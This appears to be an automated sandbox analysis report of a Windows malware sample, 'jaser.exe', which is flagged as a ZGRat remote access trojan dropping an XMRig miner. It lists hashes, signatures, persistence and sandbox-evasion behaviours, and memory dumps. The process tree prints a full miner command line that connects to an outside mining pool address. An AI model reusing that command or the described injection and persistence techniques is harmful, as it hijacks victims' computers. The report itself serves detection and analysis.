Analysis

  • max time kernel
    208s
  • max time network
    223s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-05-2024 11:56

General

  • Target

    jaser.exe

  • Size

    286.0MB

  • MD5

    45cf735073402183e3650f69b264323f

  • SHA1

    e30987fc42dd931e2fcdc02474b7a8f363e7731b

  • SHA256

    afddabb10af9cbd11a940567f1ef2a8d0483fefd47d575cae5e8e615c2f15f5b

  • SHA512

    3844fac4876376abb4b3e249ef950b8fc806098a22e857898e61cb26ecad509fdace80685681c515c3b50cd0c14be09b09f71bb68a9f1a6383f73529cd928730

  • SSDEEP

    6291456:re35QLVGaqBSYYvfeaQYbAJwD11CuIed8oA46BQ1:A5QLnqBSYYvAixcuIed+bM

Malware Config

Signatures

  • Detect ZGRat V1 34 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 40 IoCs
  • Suspicious use of SendNotifyMessage 38 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\jaser.exe
    "C:\Users\Admin\AppData\Local\Temp\jaser.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3220
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1924
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:4516
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2892

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1924-4891-0x0000000000400000-0x000000000040A000-memory.dmp

    Filesize

    40KB

  • memory/1924-4923-0x00007FFF06D30000-0x00007FFF077F1000-memory.dmp

    Filesize

    10.8MB

  • memory/1924-4912-0x00007FFF06D30000-0x00007FFF077F1000-memory.dmp

    Filesize

    10.8MB

  • memory/1924-4911-0x00007FFF06D30000-0x00007FFF077F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3220-15-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-21-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-17-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-9-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-27-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-25-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-23-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-19-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-37-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-49-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-0-0x00007FFF06D33000-0x00007FFF06D35000-memory.dmp

    Filesize

    8KB

  • memory/3220-47-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-7-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-43-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-41-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-35-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-33-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-31-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-29-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-39-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-51-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-13-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-45-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-5-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-4-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-57-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-59-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-67-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-65-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-63-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-62-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-55-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-53-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-4884-0x00007FFF06D30000-0x00007FFF077F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3220-4886-0x0000016041A60000-0x0000016041AAC000-memory.dmp

    Filesize

    304KB

  • memory/3220-4885-0x0000016041A00000-0x0000016041A5A000-memory.dmp

    Filesize

    360KB

  • memory/3220-4887-0x00000160276C0000-0x0000016027714000-memory.dmp

    Filesize

    336KB

  • memory/3220-11-0x00000160417E0000-0x00000160419F9000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-4910-0x00007FFF06D30000-0x00007FFF077F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3220-3-0x00000160417E0000-0x00000160419FE000-memory.dmp

    Filesize

    2.1MB

  • memory/3220-2-0x00007FFF06D30000-0x00007FFF077F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3220-1-0x0000016026FA0000-0x0000016027274000-memory.dmp

    Filesize

    2.8MB

  • memory/4516-4922-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4516-4943-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB